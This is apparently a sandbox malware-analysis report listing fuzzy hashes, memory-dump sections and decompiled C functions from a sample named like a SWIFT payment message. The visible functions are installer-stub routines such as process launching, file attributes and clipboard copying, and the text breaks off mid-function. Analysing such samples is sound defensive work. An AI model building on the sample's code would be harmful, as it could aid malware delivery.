Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x00402885
0x00402885
0x00402ac2
0x00402ace

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b47b1cd7a6160306081e6e292560e2a86c9e88a18a2e4b9c46391c7bd3c76fa1
Instruction ID: 18b2471a241adc9bf36c7ea4c0146ff71e49c13b27122dc007abb7967bce33ea
Opcode Fuzzy Hash: b47b1cd7a6160306081e6e292560e2a86c9e88a18a2e4b9c46391c7bd3c76fa1
Instruction Fuzzy Hash: ECD01272B04104DBDB11DBA4AF0859D72A59B50364B214577E101F11D1DAB989449A19

Uniqueness

Uniqueness Score: -1.00%

Function 0040424C Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040424C(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434ee8, 0x28, _a4, 1); // executed
				return _t2;
			}

0x0040425a
0x00404260

APIs

SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0040332B Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040332B(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403339
0x0040333f

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403339

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401F00() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C37(_t15);
				E004052E6(0xffffffeb, _t7);
				_t9 = E00405867(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E0040670D(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004061C9( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401f06
0x00401f0b
0x00401f11
0x00401f16
0x00401f1a
0x00402885
0x00401f20
0x00401f23
0x00401f26
0x00401f2e
0x00401f3d
0x00401f3f
0x00401f3f
0x00401f30
0x00401f34
0x00401f34
0x00401f2e
0x00401f46
0x00401f47
0x00401f47
0x00402ac2
0x00402ace

APIs

Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,762023A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,762023A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1

Part of subcall function 00405867: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
Part of subcall function 00405867: CloseHandle.KERNEL32(?), ref: 0040589D

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47

Part of subcall function 0040670D: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040671E
Part of subcall function 0040670D: GetExitCodeProcess.KERNEL32(?,?), ref: 00406740

Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 7f3a779b7f37120e06d7474f340a4e7cb3ad87ff6864a2c8958b24aca6dc3c02
Instruction ID: 0c3abe8747980e4b1c062509ec269ea7acbc1ace6387f940061889d1bd78c20b
Opcode Fuzzy Hash: 7f3a779b7f37120e06d7474f340a4e7cb3ad87ff6864a2c8958b24aca6dc3c02
Instruction Fuzzy Hash: F5F09032905115DBCB20FFA19D848DE62A49F01368B25057FF102F61D1C77C0E459AAE

Uniqueness

Uniqueness Score: -1.00%

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C15(_t7);
				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}

0x004014d7
0x004014d8
0x004014e1
0x004014e4
0x004014e8
0x004014e8
0x004014ea
0x00402ac2
0x00402ace

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 74cec17b6e5bdc42fdae48292e2b7f1ed30acd7f11d7a269f615db51b9722951
Instruction ID: 7b6d933f202abfdc9722895a59c2e384d2c5d1872e83ea8d1a096f69b0519c76
Opcode Fuzzy Hash: 74cec17b6e5bdc42fdae48292e2b7f1ed30acd7f11d7a269f615db51b9722951
Instruction Fuzzy Hash: D5D0A773F141008BD710EBB8BE8949E73F8E7803293208837E102F11D1E578C8428A1C

Uniqueness

Uniqueness Score: -1.00%

Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}

0x10001225
0x1000122b

APIs

GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

Memory Dump Source

Source File: 00000001.00000002.7936337323.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.7936306097.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936376155.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936411270.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405425 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405425(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ec4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004053B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004062A4(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x42d248;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x433eac == _t156) {
							ShowWindow( *0x434ee8, 8);
							if( *0x434f8c == _t156) {
								E004052E6( *((intOrPtr*)( *0x42c220 + 0x34)), _t156);
							}
							E004041F0(_t171);
							goto L25;
						}
						 *0x42ba18 = 2;
						E004041F0(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040427E(_a8, _a12, _a16);
						}
						ShowWindow( *0x433eb0, _t156);
						ShowWindow(_t169, 8);
						E0040424C(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434ef4;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433eb0 = GetDlgItem(_a4, 0x403);
				 *0x433ea8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ec4 = _t134;
				_v8 = _t134;
				E0040424C( *0x433eb0);
				 *0x433eb4 = E00404B83(4);
				 *0x433ecc = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404217(_a4);
				if(( *0x434efc & 0x00000003) != 0) {
					ShowWindow( *0x433eb0, _t156);
					if(( *0x434efc & 0x00000002) != 0) {
						 *0x433eb0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040424C( *0x433ea8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434efc & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x0040542d
0x00405433
0x0040543d
0x00405440
0x004055d6
0x004055fa
0x004055fa
0x0040560d
0x0040562b
0x0040562d
0x00405635
0x0040568b
0x0040568f
0x00000000
0x00000000
0x00405691
0x00405697
0x00000000
0x00000000
0x004056a1
0x004056a9
0x004056ac
0x004057ae
0x00000000
0x004057ae
0x004056bb
0x004056c6
0x004056cf
0x004056da
0x004056dd
0x004056e6
0x004056ec
0x004056ef
0x004056ef
0x00405707
0x00405710
0x00405713
0x0040571a
0x00405721
0x00405729
0x00405729
0x00405740
0x00405740
0x00405747
0x0040574d
0x00405759
0x00405760
0x00405769
0x0040576b
0x0040576e
0x0040577d
0x00405780
0x00405786
0x00405787
0x0040578d
0x0040578e
0x0040578f
0x00405797
0x004057a2
0x004057a8
0x004057a8
0x00000000
0x00405707
0x0040563d
0x0040566d
0x00405675
0x00405680
0x00405680
0x00405686
0x00000000
0x00405686
0x00405641
0x0040564b
0x00000000
0x0040560f
0x00405615
0x00405650
0x00000000
0x00405659
0x0040561e
0x00405623
0x00405626
0x00000000
0x00405626
0x0040560d
0x00405446
0x0040544a
0x00405452
0x00405456
0x00405459
0x0040545c
0x0040545f
0x00405462
0x00405463
0x00405464
0x0040547d
0x00405480
0x0040548a
0x00405499
0x004054a1
0x004054a9
0x004054ae
0x004054b1
0x004054bd
0x004054c6
0x004054cf
0x004054f1
0x004054f7
0x00405508
0x0040550d
0x0040551b
0x00405529
0x00405529
0x0040552e
0x0040553c
0x0040553c
0x00405541
0x00405544
0x00405549
0x00405555
0x0040555e
0x0040556b
0x0040557a
0x0040556d
0x00405572
0x00405572
0x00405586
0x00405586
0x0040559a
0x004055a3
0x004055ac
0x004055bc
0x004055c8
0x004055c8
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405483
GetDlgItem.USER32(?,000003EE), ref: 00405492
GetClientRect.USER32(?,?), ref: 004054CF
GetSystemMetrics.USER32(00000002), ref: 004054D6
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054F7
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405508
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040551B
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405529
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040553C
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040555E
ShowWindow.USER32(?,00000008), ref: 00405572
GetDlgItem.USER32(?,000003EC), ref: 00405593
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A3
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055BC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055C8
GetDlgItem.USER32(?,000003F8), ref: 004054A1

Part of subcall function 0040424C: SendMessageW.USER32(00000028,?,00000001,00404077), ref: 0040425A

GetDlgItem.USER32(?,000003EC), ref: 004055E5
CreateThread.KERNEL32(00000000,00000000,Function_000053B9,00000000), ref: 004055F3
CloseHandle.KERNEL32(00000000), ref: 004055FA
ShowWindow.USER32(00000000), ref: 0040561E
ShowWindow.USER32(?,00000008), ref: 00405623
ShowWindow.USER32(00000008), ref: 0040566D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A1
CreatePopupMenu.USER32 ref: 004056B2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056C6
GetWindowRect.USER32(?,?), ref: 004056E6
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056FF
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405737
OpenClipboard.USER32(00000000), ref: 00405747
EmptyClipboard.USER32 ref: 0040574D
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405759
GlobalLock.KERNEL32(00000000), ref: 00405763
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405777
GlobalUnlock.KERNEL32(00000000), ref: 00405797
SetClipboardData.USER32(0000000D,00000000), ref: 004057A2
CloseClipboard.USER32 ref: 004057A8

Strings

{, xrefs: 0040568B

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
Instruction ID: 2f82927f57e7d4f45bca6e23eab998b55dded590160266c2ba262d9988700e91
Opcode Fuzzy Hash: 008adb25098ef1b1bb6e7edf5b259777504a6f11eb67abc6bb5002a761aaad34
Instruction Fuzzy Hash: 37B16970800608BFDB119FA0DD89AAE7B79FB48355F00403AFA45B61A0CB759E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 004046E6 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004046E6(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c220;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x435000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004058C8(0x3fb, _t146);
					E00406516(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004058C8(0x3fb, _t146);
							if(E00405C5B(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406282(0x42b218, _t146);
							_t87 = E0040665C(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406282(0x42b218, _t146);
								_t89 = E00405BFE(0x42b218);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
